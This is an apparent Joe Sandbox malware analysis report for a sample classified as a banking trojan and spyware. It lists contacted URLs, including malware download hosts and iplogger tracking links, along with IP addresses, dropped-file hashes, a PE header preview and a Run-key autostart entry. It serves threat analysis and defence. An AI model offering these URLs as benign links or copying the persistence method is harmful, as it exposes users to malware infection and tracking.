                                                                                                          http://crt.sectigo.com/SectigoRSADomainValidationSec)jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.winimage.com/zLibDllubisoftpro.exefalse
                                                                                                            high
                                                                                                            http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d887askinstall21.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.fddnice.pw/askinstall21.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://Ojyehq4jg.2ihsfa.com/hjjgaa.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://pki.goog/gsr2/GTSGIAG3.crt0)jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://iplogger.org/1yXwr7askinstall21.exefalse
                                                                                                              high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
101.36.107.74 | unknown | China | 135377 | UHGL-AS-AP UCloud HK Holdings Group Limited HK | false
88.99.66.31 | unknown | Germany | 24940 | HETZNER-AS DE | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 324174
Start date: 28.11.2020
Start time: 15:04:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: KeJ7Cl7flZ.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winEXE@13/35@12/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 18.4% (good quality ratio 17.5%)
• Quality average: 78.6%
• Quality standard deviation: 28%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.42.151.234, 92.122.144.200, 51.104.144.132, 20.54.26.129, 51.103.5.159, 52.142.114.176, 92.122.213.194, 92.122.213.247, 51.11.168.160, 104.43.139.144
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, ris.api.iris.microsoft.com, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Too many dropped files, some of them have not been restored

Simulations

Behavior and APIs

Time | Type | Description
15:05:24 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
15:07:10 | API Interceptor | 1x Sleep call for process: jg2_2qua.exe modified
15:07:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Host C:\ProgramData\Windows Host\Windows Host.exe

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
88.99.66.31 | cli.exe | malicious | ezstat.ru/1BiQt7.html
88.99.66.31 | R7w74RKW9A.exe | malicious | ezstat.ru/1BiQt7.html
88.99.66.31 | pqSZtQiuRy.exe | malicious | iplogger.org/14mvt7.gz
88.99.66.31 | 3MndTUzGQn.exe | malicious | iplogger.org/14qK87
88.99.66.31 | fEBNeNkRYI.doc | malicious | iplogger.org/1cyy87.jpg
88.99.66.31 | Delivery-77426522.doc | malicious | iplogger.org/1cyy87.jpg
88.99.66.31 | mesager43.exe | malicious | iplogger.org/1cyy87.jpg
88.99.66.31 | hci0xn0zip.exe | malicious | iplogger.org/1cyy87.jpg
88.99.66.31 | DOC001.exe | malicious | 2no.co/1Lan77
88.99.66.31 | DOC001 (3).exe | malicious | 2no.co/1Lan77
88.99.66.31 | urgently.exe | malicious | iplogger.org/1Uu547.tgz
88.99.66.31 | SecuriteInfo.com.Generic.mg.e26982b170856ca8.exe | malicious | iplogger.org/1Uu547.tgz
88.99.66.31 | trwf3446.doc | malicious | iplogger.org/1Uu547.tgz
88.99.66.31 | 2020_1549496734.doc | malicious | maper.info/XtDei
88.99.66.31 | 2020_1549496734.doc | malicious | maper.info/XtDei
88.99.66.31 | http://maper.info | malicious | maper.info/
88.99.66.31 | clipp.exe | malicious | iplogger.com/1NAnw7
88.99.66.31 | por.exe | malicious |
                                                                                                              • ezstat.ru/1kDj27
                                                                                                              morfer.exeGet hashmaliciousBrowse
                                                                                                              • iplo.ru/1VJfB6.jpeg
                                                                                                              image2017-11-22-5864621.vbsGet hashmaliciousBrowse
                                                                                                              • iplogger.co/18RtV6.jpg

                                                                                                              Domains


                                                                                                              ASN


                                                                                                              JA3 Fingerprints

                                                                                                              document-1506903149.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              http://culturenempathy.org/Get hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              case.8920.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31
                                                                                                              document-1497815773.xlsGet hashmaliciousBrowse
                                                                                                              • 88.99.66.31

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):490274830
                                                                                                              Entropy (8bit):0.13399746942054178
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:
                                                                                                              MD5:C4E00A325E324C12C52D45A2C5A0B7CA
                                                                                                              SHA1:F457B527850FB82A942A33DE7195356BA76F3C89
                                                                                                              SHA-256:A958A1908B2473BD3A7547122602ADF7FFAFC17D94B52E95CD99836CD1E6CE96
                                                                                                              SHA-512:301DC8DD9D61D90157D989CCC0F3D6897EC18EA6A6F3665D6647E6848C11C39D6A01D624914399CE5FAFA2914BEBAE830FB0C29D5B2A0C3BFD5D14693677F042
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview: MZ......................@..................................................3.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..........@.......c....... ....@...........................................@.......@.....................<...T.......P........................................................................... ..@............................text............................... ....rdata..\.... ......................@..@.data............h..................@....rsrc...P............H..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_002.exe_1c529646ab3c8a1fdb7fc485aa1d9d3291c12_6234ae00_0086ee01\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12056
                                                                                                              Entropy (8bit):3.7759983087181124
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:yIqpHMfd/UUT+njbttz/u7sUS274ItiRX:5qZMf1UUqjH/u7sUX4ItSX
                                                                                                              MD5:99CA516681EAE4643633DEDF3DA3D372
                                                                                                              SHA1:FF67FCADDA5993CFAA69296AEFCF155893C279EB
                                                                                                              SHA-256:3045F06E40C928526C531FEF56D0EF172C7B45CDAC87D59A81073D4F10A2CE9E
                                                                                                              SHA-512:54AB45588862D5AAF79B609EA8F52430926F354C530BB1166383861F0FE0C3235548351A1DFD270C6A24822B5DEEB543FF85B4DCB54FA35B44E1F051514ED679
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.1.0.7.8.3.1.9.1.0.5.4.3.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.1.0.7.8.3.2.2.9.6.4.8.1.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.8.9.b.b.7.e.-.d.a.f.3.-.4.7.5.b.-.8.e.9.b.-.c.1.7.a.d.5.1.7.6.5.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.7.6.4.9.6.8.-.a.2.a.9.-.4.d.7.d.-.9.d.3.1.-.d.9.6.2.1.9.8.3.7.4.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.0.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.2.0.2.0.1.1.0.9._.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.f.0.-.0.0.0.1.-.0.0.1.6.-.8.8.a.1.-.f.e.e.e.d.a.c.5.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.2.c.d.a.b.d.2.7.f.6.c.7.d.f.b.c.5.a.d.8.6.2.c.4.0.2.7.a.3.0.d.0.0.0.0.0.4.0.8.!.0.0.0.0.f.e.d.b.7.6.0.f.6.7.f.6.0.0.0.b.f.3.1.1.c.7.6.d.f.f.5.5.c.3.5.b.e.e.d.a.8.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_002.exe_566a661da143f3fc1b192bf169fbb3659a52956_6234ae00_00871c35\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12048
                                                                                                              Entropy (8bit):3.772567716869348
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:pwQfqJ3HbcjA+njbttz/u7sUS274ItiRs:jqJbcjVjH/u7sUX4ItSs
                                                                                                              MD5:DE39AECB7DE27D5C6CCFEDEB1BFC6A10
                                                                                                              SHA1:BED09940E0337BC7FE6E839750A76EAFCB260CC8
                                                                                                              SHA-256:98D49983ADF4C7542B44BEDA4D3779862CDB4BF97D390EEF314C2673016DF157
                                                                                                              SHA-512:B48EC3BE49299FD5199199AC3392DE7888CA74C0EA5FAC0C5D172D0C1A63C8E99365453A8D762595662C558A134A7A7D97151FA69680BA698264E9AF0C0859BE
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.1.0.7.8.3.3.0.5.4.2.9.2.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.1.0.7.8.3.3.5.0.4.2.9.2.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.b.0.7.c.d.3.-.a.2.9.6.-.4.d.8.c.-.b.6.c.f.-.b.5.c.a.8.7.8.8.6.e.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.f.d.e.8.3.6.-.f.e.f.2.-.4.5.f.7.-.8.2.3.0.-.d.6.e.4.3.a.d.b.e.c.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.0.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.2.0.2.0.1.1.0.9._.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.f.0.-.0.0.0.1.-.0.0.1.6.-.8.8.a.1.-.f.e.e.e.d.a.c.5.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.2.c.d.a.b.d.2.7.f.6.c.7.d.f.b.c.5.a.d.8.6.2.c.4.0.2.7.a.3.0.d.0.0.0.0.0.4.0.8.!.0.0.0.0.f.e.d.b.7.6.0.f.6.7.f.6.0.0.0.b.f.3.1.1.c.7.6.d.f.f.5.5.c.3.5.b.e.e.d.a.8.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER439.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Sat Nov 28 23:05:31 2020, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):62728
                                                                                                              Entropy (8bit):1.8912382117232474
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:5llPvcmIwARaNqcYmN5x3qjlGtadY/xIKV/pkHa7ILDz9rGEUi1Tx7:lvcsAkg0N5x6GoW/x7Bq/kSX
                                                                                                              MD5:72AFCDBE07E222E0A9B13E1C9FC83751
                                                                                                              SHA1:0195A8A0CBB567E43903653126F7F16104D955B4
                                                                                                              SHA-256:F37A52664590A33123433479536BF9FA30DC9A5AD6A38B5BD8D188DD682BF356
                                                                                                              SHA-512:7D60C593C601FD6309714F70B467DCB08D91BA90F62F366BB4F8E8B7D232B2019F35AEF56015E7336855DBFD4513EA0321F047FCD6411986D948226EBF2B27B4
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... .........._...................U...........B...... .......GenuineIntelW...........T.............._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA45.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8286
                                                                                                              Entropy (8bit):3.703844921832443
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNir66p6YC369gmfjSBCpDK89bN/sfEvm:RrlsNim6p6Y669gmfjSCNkfh
                                                                                                              MD5:5E1680D58C9310366B58FA0BECDE2CDE
                                                                                                              SHA1:E1A2403D1DA40605DC82418454C57961B5534B1E
                                                                                                              SHA-256:A736E83BA14E746424058B6CDB09DAE60E5F207757AE6E35ADDD170736F1B50A
                                                                                                              SHA-512:8CDE417E7F9220421F3A7B42464A240171D0D42647151B6B243C0F509CEBD7B8B78610F14F8B331FCE4751E94462BFD7C86261BC990AA96DC36C227415AC767A
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.6.8.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD05.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4628
                                                                                                              Entropy (8bit):4.463401774562659
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zsVJgtWI9b7WSC8BnM+8fm8M4JsIhFFdI+q8OKaD4Evgqbd:uITfvkKSN8JBrIrB4Evgqbd
                                                                                                              MD5:719846863F13CDFE6A4B6C2AD6340F65
                                                                                                              SHA1:E1A00C1AF960014F33D14771CD7541BAAA7D8E8D
                                                                                                              SHA-256:75E86458817096DC98B0A6844DBFEF3A5BD125BE2F9BC4E26012DFB0F501513C
                                                                                                              SHA-512:0A6CEC446C4F3032C32DEB12C34BBD87C38DAC3BB423D6FD619F7FDC9B431940411BA930523B1830453D50544EE7E19758F07C4562530EE80E057B1C8D205713
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="749296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD78B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 14 streams, Sat Nov 28 23:05:20 2020, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66612
                                                                                                              Entropy (8bit):1.9820330049632604
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:K1Oc59bDqecmIwARaNqcYmN5x3T4Fb8C6adY/xIKV/pmyx+mw/KOtuaG/SeOjr:8HyecsAkg0N5xcFbF1W/x7BmyCdjeo
                                                                                                              MD5:E24FB2EEBF67A573571B8420646E8774
                                                                                                              SHA1:2AE347D084DD202B1A480B0AD80C90EEA9C33C37
                                                                                                              SHA-256:D0D2A8D25A43130FC1DE5786080F531584F128E4D3125A4E7AB9BEC0D2EE916B
                                                                                                              SHA-512:9D7EBA878D08508AD2120E670E97463E7CFDDB0986ED0DE82DDA63C71C8E6E27B58BDC65679082C79A248241CB4D3B61673CFDED2E492F87C4E8739872C37531
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... .........._...................U...........B...... .......GenuineIntelW...........T.............._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD97.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8286
                                                                                                              Entropy (8bit):3.7043446739903163
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNirZ6Nz6YCM69gmfXS5d6XCprl+89bO/sfaam:RrlsNil6J6YJ69gmfXS5MCOkfO
                                                                                                              MD5:A97C062B460F1282B1C3003BD4B5DAC7
                                                                                                              SHA1:11ED92911321C80907CAD4BAD55F14D41F4FDAB8
                                                                                                              SHA-256:452040C59F65042A6FFC4031A66170F9E053F2C999B2384D7320B17666DF5460
                                                                                                              SHA-512:C8F443B8AEB190FA5E5C6755CF5D0CA0DC1624512DD37CBFF3FC5F5D2A5E1EB065470CC34F13E6BE5591FFE315BE11F8C8CD9C18E8CF45AAB7AFC58094AFFF53
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.6.8.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFCB.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4632
                                                                                                              Entropy (8bit):4.468168107337762
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zssJgtWI9b7WSC8BU8fm8M4JssZFt+q8cD/4Evgqbd:uITfqkKSNDJtxr/4Evgqbd
                                                                                                              MD5:69934B4EA55B849D6507300552AD293F
                                                                                                              SHA1:8254DD228E1685D7AACA7F54F3C5F2A284F4B2C8
                                                                                                              SHA-256:A84AB5A40CD2F2FE21573ED70246AC8BA492150AC8F0BFE24A6D9086600689CB
                                                                                                              SHA-512:19C3EB1B8AF3FE12B05174DC6068B1E2992AFA85D202764233317C6F8534E72D2B003E8BD6DC235313F0B8C3CD8576AA9DB3132C05CF361BF6C64CCB7287D79C
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="749295" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):6.867501832742936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                              MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                              SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                              SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                              SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                              Malicious:false
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):52520
                                                                                                              Entropy (8bit):6.011934677477037
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                              MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                              SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                              SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                              SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1864
                                                                                                              Entropy (8bit):4.118434704813
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:DAC+SWx9cbv+eufJft0II/PD3Ccb2/SG+Df:DA3locxlX8ryxSG+
                                                                                                              MD5:04D0BDDEDBBC170CF791228E77032526
                                                                                                              SHA1:BF83D0C38B89D40CB72B63C4F1E74334F11B20D7
